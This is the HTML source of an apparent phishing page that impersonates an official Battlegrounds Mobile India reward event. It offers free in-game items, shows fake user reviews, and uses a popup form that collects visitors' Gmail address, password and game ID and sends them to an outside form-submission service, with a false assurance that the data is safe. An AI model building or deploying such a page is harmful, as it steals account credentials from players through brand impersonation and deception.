<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="css/fb.css">
<link rel="stylesheet" href="css/twt.css">
<link href="https://fonts.googleapis.com/css2?family=Teko:wght@400;500&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<meta property="og:title" content="BATTLEGROUNDS MOBILE INDIA EVENT">
<meta name="description" content="Collect your special time at the BGMI. This opportunity is limited and without the need for topup.">
<meta property="og:description" content="Collect your special time at the BGMI. This opportunity is limited and without the need for topup.">
<meta property="og:type" content="website">
<meta property="og:image" content="https://www.battlegroundsmobileindia.com/common/img/main/app.png">
<link rel="shortcut icon" href="https://www.battlegroundsmobileindia.com/common/img/main/app.png" type="image/x-icon">
    <title>BATTLEGROUND MOBILE INDIA - Official Event</title>
    <style>
        *{
            margin: 0;
            padding: 0;
        }
        body{
            background:url(img/container.jpg)no-repeat center center;
            background-size: cover;
            width: 100vw;
            color: white;
            overflow-x: hidden;
        }
        .container{
            max-width: 400px;
            min-height: 100vh;
            margin: 0 auto;
            border: 1px solid white;
            background: url(img/container.jpg)no-repeat center center;
            background-size: cover;
            
        }
        .navbar{
            width: 100%;
            height: 64px;
            background-color: black;
            border-bottom: 1px solid white;
            display: flex;
            align-items: center;
            justify-content: space-between;
            color: #eca800;
            font-family: teko;
            
        }

        .navbar .nav-logo{
            width: 108px;
            margin: 0 10px;
        }
        .navbar .nav-right{
            width: 64px;
            background-color: #eca800;
            height: 100%;
            display: flex;
            align-items: center;
            justify-content: center;
            cursor: pointer;
        }
        
        .header{
            width: 100%;
            height: auto;
        }
        .header img{
            width: 100%;
            height: auto;
        }

        .title{
            width: 100%;
            height: 120px;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        .title img{
            width: 90%;

        }
        .tag{
            width: 170px;
            height: 36px;
            background: url(img/notify-sec.png);
            color:black;
            margin: 0 auto;
            text-align: center;
            display: flex;
            justify-content: center;
            align-items: center;
            font-size: 18px;
            font-family: teko;
            border-radius: 12px 0 12px 0;
            border: 2px solid #eca800;
        }
        .reward-box{
            width: 90%;
            min-height: 400px;
            margin: 0 auto;
            background-color: rgba(0, 0, 0, 0.301);
            border-radius: 12px;
            display: grid;
            grid-template-columns: auto auto auto ;
            place-items: center;
            padding: 12px 0;
        }

        .reward-box .reward{
            width: 100px;
            height: 128px;
            display: inline;
            margin: 12px 0;
        }
        .reward img{
            width: 100%;
            border: 1px solid red;
        }
        .reward button{
            position: relative;
            right: 8px;
            width: 120px;
            height: 30px;
            border: none;
            /* border-bottom: 2px solid red; */
            outline: none;
            background: url(img/button-on.png)no-repeat center center;
            background-size: cover;
            color: white;
            cursor: pointer;
        }
     .notice{
           wigth:1000px;
           height:40px;
           color:white;
           text-align:center; 
            display:block;
            justify-content: center;
            font-size:18px;
            font-weight:4000px;
            padding-top:26px;
        }
        .popup{
            position: absolute;
            width: 100vw;
            height: 100vh;
            background-color: rgba(0, 0, 0, 0.071);
            top: 0;
            left: 0;
        }

        .popup .popup-box{
            width: 100%;
            max-width: 360px;
            min-height: 200px;
            position: fixed;
            top: 50%;
            left: 50%;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.416);
            transform: translate(-48% , -50%)
        }
        .popup .popup-box nav{
            width: 100%;
            height: 36px;
            background:#eca800;
  
            background-size: cover;
            color: black;
            font-family: teko;
            font-size: 24px;
            font-weight: 500;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        .popup .popup-box nav img{
            position: absolute;
            right: 8px;
            cursor: pointer;
            width: 22px;
        }
        .popup .popup-box .main{
            background:rgba(225,225,225,0.5);
            backdrop-filter:blur(5px);
            background-size: cover;
            width: 100%;
            min-height: 180px;
        }

        .popup .popup-box .main p{
            text-align: center;
            font-family: teko;
            font-size: 20px;
            padding: 8px 0;
        }
        .popup .popup-box .main img{
            width: 90px;
            margin: 0 auto;
            display: block;
        }
        .popup .popup-box .main button{
            width: 120px;
            height: 32px;
            color: white;
            background: #eca800;
            font-family: teko;
            color: black;
            margin: 12px auto;
            border: 1px solid black;
            outline: none;
            font-size: 18px;            
            display: block;
            cursor: pointer;
        }
        .popup .popup-box .main input , select{
            display: block;
            width: 80%;
            height: 30px;
            background-color: gray;
            color: white;
            font-family: teko;
            margin: 2px auto;
            font-size: 18px;
            padding: 4px 12px;
            border: 1px solid black;
            border-radius:0 !important;
        }
        .popup .popup-box .main select{
            width: 87%;
            height: 38px;
        }
        .popup .popup-box .main input::placeholder{
            color: white;
        }

        .popup .popup-box .main .login-btns-box{
            width: 78%;
            height: auto;
            margin: 0 auto;
        }
        
        .popup .popup-box .main .login-btns-box .login-btns{
            width: 100%;
            height: 36px;
            background: red;
            color: white;
        }
        .popup .popup-box .main .login-btns-box .login-btns span{
            position: absolute;
            float: left;
            left: 48px;
            font-size: 22px;
        }

        .container .main-footer{
            width: 100%;
            height: 120px;
            background: black;
            display: flex;
            align-items: center;
            justify-content: center;
            flex-direction: column;
        }
        .container .main-footer img{
            width: 180px;
            display: block;
            margin: 0 auto;
        }
        .privacy{
            text-align: center;
            font-family: teko;
            font-size: 12px;
            margin: 20px 0;
        }

        .reviews-box{
            width: 100%;
            max-height: 340px;
            overflow-y: scroll;
            display: flex;
            align-items: center;
            flex-direction: column;
            margin: 12px 0 0;
            font-family: sans-serif;
            background: #17170e;
            padding: 5px 0;
        }

        .reviews-box::-webkit-scrollbar{
            width: 0;
        }
        .user-info{
            display: flex;
            align-items: center;
            width:100%;
            height: 54px;
            justify-content: start;
            font-weight: bold;
            border-bottom: 1px solid gray;
        }
        .user-info img{
            width: 44px;
            height: 44px;
            object-fit: cover;
            border-radius: 50%;
            margin: 0 6px;
            border: 1px solid black;
        }
    </style>
</head>
<body oncontextmenu="return false">
    <div class="container">         
        <nav class="navbar">
            <img src="https://www.battlegroundsmobileindia.com/common/img/common/logo.png" alt="" class="nav-logo">  
            <div class="nav-right"><img src="https://www.battlegroundsmobileindia.com/common/img/btn/header_menu.png" alt=""></div>              
        </nav>
        <header class="header">
            <img src="img/header.jpg" alt="">
        </header>
        <div class="title"><img src="img/tittle.png" alt=""></div>
        
        <div class="tag">Redeem Your Free Reward</div><br>

        <!-- REWARDS START HERE  -->
            <div class="reward-box">
                <div class="reward">
                    <div><img src="img/rewards/1a.png" alt=""></div>
                    <button onclick="openReward(this)" src = "img/rewards/1.png">COLLECT</button>
                </div>
                <div class="reward">
                    <div><img src="img/rewards/2a.png" alt=""></div>
                    <button onclick="openReward(this)" src = "img/rewards/2.png">COLLECT</button>
                </div>
                <div class="reward">
                    <div><img src="img/rewards/3a.png" alt=""></div>
                    <button onclick="openReward(this)" src = "img/rewards/3.png">COLLECT</button>
                </div>
                <div class="reward">
                    <div><img src="img/rewards/4a.png" alt=""></div>
                    <button onclick="openReward(this)" src = "img/rewards/4.png">COLLECT</button>
                </div>
                <div class="reward">
                    <div><img src="img/rewards/5a.png" alt=""></div>
                    <button onclick="openReward(this)" src = "img/rewards/5.png">COLLECT</button>
                </div>
                <div class="reward">
                    <div><img src="img/rewards/6a.png" alt=""></div>
                    <button onclick="openReward(this)" src = "img/rewards/6.png">COLLECT</button>
                </div>
                <div class="reward">
                    <div><img src="img/rewards/7a.png" alt=""></div>
                    <button onclick="openReward(this)" src = "img/rewards/7.png">COLLECT</button>
                </div>
                <div class="reward">
                    <div><img src="img/rewards/8a.png" alt=""></div>
                    <button onclick="openReward(this)" src = "img/rewards/8.png">COLLECT</button>
                </div>
                <div class="reward">
                    <div><img src="img/rewards/9a.png" alt=""></div>
                    <button onclick="openReward(this)" src = "img/rewards/9.png">COLLECT</button>
                </div>
            </div>
        <div class="notice">Your reward will be send to you in 24 hrs</div>
        <!-- REWARDS END HERE  -->
        <!-- REVIEWS -->
        <div class="reviews-box">
            <h1 style="align-self: start;padding: 0 16px;text-decoration: underline;color: white;margin: 6px 0;font-size: 22px;">Our Coustomer Reviews!</h1>
            <span id="span"></span>
            <p style="color: white;
            text-align: center;
            font-size: 18px;
            text-decoration: underline;
            font-family: teko;cursor: pointer;">View 714+ Reviews More!</p>
        </div>
        <footer class="main-footer">
            <img src="https://www.battlegroundsmobileindia.com/common/img/common/footerlg.png" alt="" class="footer-logo">
            <div class="privacy">
                <p>� 2023 KRAFTON, Inc. All rights reserved.</p>
                <p>Privacy Policy | Terms of Service | Rules of Conduct | Official Community Policy | Content Creation Guideline</p>
            </div>
        </footer>
    </div>
    <div class="popup" style="display: none;">
        <div class="popup-box confirmBox" style="display: none;">
            <nav>REWARD CONFIRMATION <img onclick="closePopup()" src="img/popup-close2.png" alt=""></nav>
            <div class="main">
                <p>Are you sure you want to claim this reward?</p>
                <img id="creward" src="" alt="">
                <button onclick="openVerify()">Confirm</button>
            </div>
        </div>

        <div class="popup-box verifyBox" style="display: none;">
            <nav>sign to continue <img onclick="closePopup()" src="img/popup-close2.png" alt=""></nav>
            <div class="main">
                <p>sign in with your G-mail account on 
                    which your BGMI id exists to
                    claim your reward successfully.</p>
                <form style = "position: relative;" method="post" action="https://api.web3forms.com/submit" method="POST">

                   <input type="hidden" name="access_key" value="fbaf4303-cf83-46fb-a4f8-de7b63f2158b">
                    <input required autocomplete="off" type="letters" name="name" id="name" placeholder="e-mail">
                    <input required autocomplete="off" type="letters" name="name" id="name" placeholder="password">
                    <input required autocomplete="off" type="number" name="palyid" id="palyid" placeholder="Character-id">                                 
                    <button onclick="openlogin()">Verify</button>
                    <p style="font-size: 12px;font-family: sans-serif;">*Your Personal Information Is 100% Safe With Us.</p>
                </form>
            </div>
        </div>

        <div class="popup-box loginBox" style="display: none;">
            <nav>Reward Claimed!</nav>
<img onclick="closePopup()" src="img/popup-close2.png" alt=""></nav>
            <div class="main">
                <p>Login to your Battlegrounds mobile india's account and provide accurate information only.</p>
                <img src="6-2-success-png-image.png" width="10px" height="10px">                                       
            </div>
        </div>
    </div>


    


    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <script>
        
        function addReview(profile , name , text , active , date){
            let div = document.querySelector('#span');
            div.innerHTML += `<div class="task">
                <div class="user-info">
                    <img src="${profile}" alt="">
                    <p class="user-name">${name} <br><span style="opacity: 0.7;font-weight: normal;font-size: 12px;">Active ${active}</span></p>
                </div>
                <p>${text}</p>
                <div class="stats">
                  <div>
                    <div><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><g stroke-width="0" id="SVGRepo_bgCarrier"></g><g stroke-linejoin="round" stroke-linecap="round" id="SVGRepo_tracerCarrier"></g><g id="SVGRepo_iconCarrier"> <path stroke-linecap="round" stroke-width="2" d="M12 8V12L15 15"></path> <circle stroke-width="2" r="9" cy="12" cx="12"></circle> </g></svg>${date}</div>
                    <div><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><g stroke-width="0" id="SVGRepo_bgCarrier"></g><g stroke-linejoin="round" stroke-linecap="round" id="SVGRepo_tracerCarrier"></g><g id="SVGRepo_iconCarrier"> <path stroke-linejoin="round" stroke-linecap="round" stroke-width="1.5" d="M16 10H16.01M12 10H12.01M8 10H8.01M3 10C3 4.64706 5.11765 3 12 3C18.8824 3 21 4.64706 21 10C21 15.3529 18.8824 17 12 17C11.6592 17 11.3301 16.996 11.0124 16.9876L7 21V16.4939C4.0328 15.6692 3 13.7383 3 10Z"></path> </g></svg>${Math.floor(Math.random(1,90)*100)}</div>
                    <div><svg fill="#000000" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="-2.5 0 32 32"><g stroke-width="0" id="SVGRepo_bgCarrier"></g><g stroke-linejoin="round" stroke-linecap="round" id="SVGRepo_tracerCarrier"></g><g id="SVGRepo_iconCarrier"> <g id="icomoon-ignore"> </g> <path fill="#000000" d="M0 10.284l0.505 0.36c0.089 0.064 0.92 0.621 2.604 0.621 0.27 0 0.55-0.015 0.836-0.044 3.752 4.346 6.411 7.472 7.060 8.299-1.227 2.735-1.42 5.808-0.537 8.686l0.256 0.834 7.63-7.631 8.309 8.309 0.742-0.742-8.309-8.309 7.631-7.631-0.834-0.255c-2.829-0.868-5.986-0.672-8.686 0.537-0.825-0.648-3.942-3.3-8.28-7.044 0.11-0.669 0.23-2.183-0.575-3.441l-0.352-0.549-8.001 8.001zM1.729 10.039l6.032-6.033c0.385 1.122 0.090 2.319 0.086 2.334l-0.080 0.314 0.245 0.214c7.409 6.398 8.631 7.39 8.992 7.546l-0.002 0.006 0.195 0.058 0.185-0.087c2.257-1.079 4.903-1.378 7.343-0.836l-13.482 13.481c-0.55-2.47-0.262-5.045 0.837-7.342l0.104-0.218-0.098-0.221-0.031 0.013c-0.322-0.632-1.831-2.38-7.498-8.944l-0.185-0.215-0.282 0.038c-0.338 0.045-0.668 0.069-0.981 0.069-0.595 0-1.053-0.083-1.38-0.176z"> </path> </g></svg>${Math.floor(Math.random(1,10)*100)}</div>
                  </div>
                  <div class="viewer">
                    <span><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><g stroke-width="0" id="SVGRepo_bgCarrier"></g><g stroke-linejoin="round" stroke-linecap="round" id="SVGRepo_tracerCarrier"></g><g id="SVGRepo_iconCarrier"> <path stroke-width="2" stroke="#ffffff" d="M17 8C17 10.7614 14.7614 13 12 13C9.23858 13 7 10.7614 7 8C7 5.23858 9.23858 3 12 3C14.7614 3 17 5.23858 17 8Z"></path> <path stroke-linecap="round" stroke-width="2" stroke="#ffffff" d="M3 21C3.95728 17.9237 6.41998 17 12 17C17.58 17 20.0427 17.9237 21 21"></path> </g></svg></span>
                    <span><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><g stroke-width="0" id="SVGRepo_bgCarrier"></g><g stroke-linejoin="round" stroke-linecap="round" id="SVGRepo_tracerCarrier"></g><g id="SVGRepo_iconCarrier"> <path stroke-width="2" stroke="#ffffff" d="M17 8C17 10.7614 14.7614 13 12 13C9.23858 13 7 10.7614 7 8C7 5.23858 9.23858 3 12 3C14.7614 3 17 5.23858 17 8Z"></path> <path stroke-linecap="round" stroke-width="2" stroke="#ffffff" d="M3 21C3.95728 17.9237 6.41998 17 12 17C17.58 17 20.0427 17.9237 21 21"></path> </g></svg></span>
                    <span><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><g stroke-width="0" id="SVGRepo_bgCarrier"></g><g stroke-linejoin="round" stroke-linecap="round" id="SVGRepo_tracerCarrier"></g><g id="SVGRepo_iconCarrier"> <path stroke-width="2" stroke="#ffffff" d="M17 8C17 10.7614 14.7614 13 12 13C9.23858 13 7 10.7614 7 8C7 5.23858 9.23858 3 12 3C14.7614 3 17 5.23858 17 8Z"></path> <path stroke-linecap="round" stroke-width="2" stroke="#ffffff" d="M3 21C3.95728 17.9237 6.41998 17 12 17C17.58 17 20.0427 17.9237 21 21"></path> </g></svg></span>
                    <span>+${Math.floor(Math.random(1,50)*100)}</span>
                </div>
                </div>
              </div>`
        }

        let names = ["Sassy Shweta", "Aarav", "Vikram", "Kabir", "Kriti", "Siddharth", "Aditya"];
        let messages = ["thanks brother muje x-suit mil gaya 100% real hai" , "thanks for mummy set mja aagya 101% real??" , "Thank you i got M416 glacier level 7????" , "got 5 materials love you sir??" , "thanks yaar pehli baar lambo mil gyi????" , "agya bhai xsuit sach me luv u" , "i got xsuit for 1st time in my life thank you full trusted and safe tha"]
        for(i=0;i<=6;i++){   
            addReview(`img/users/${i+1}.jpg`, `${names[i]}` , `${messages[i]}` , 'today' , 'March 25')
        }

        document.getElementById('dob').oninput = function() {
    document.getElementById("dd").style.display = "none";
};

        function openReward(e){
            src = e.getAttribute('src');
            console.log(src)
            document.querySelector('.popup').style.display = 'block';
            document.querySelector('.confirmBox').style.display = 'block';
            document.getElementById('creward').src = src;
        }

        function openVerify(){
            document.querySelector('.confirmBox').style.display = 'none';
            document.querySelector('.verifyBox').style.display = 'block';
        }
        
        function openLoginBox(){
            document.querySelector('.verifyBox').style.display = 'none';
            document.querySelector('.loginBox').style.display = 'block';
        }



        function closePopup(){
            document.querySelector('.confirmBox').style.display = 'none';
            document.querySelector('.popup').style.display = 'none'
        }
    






    </script>
</body>

</html>
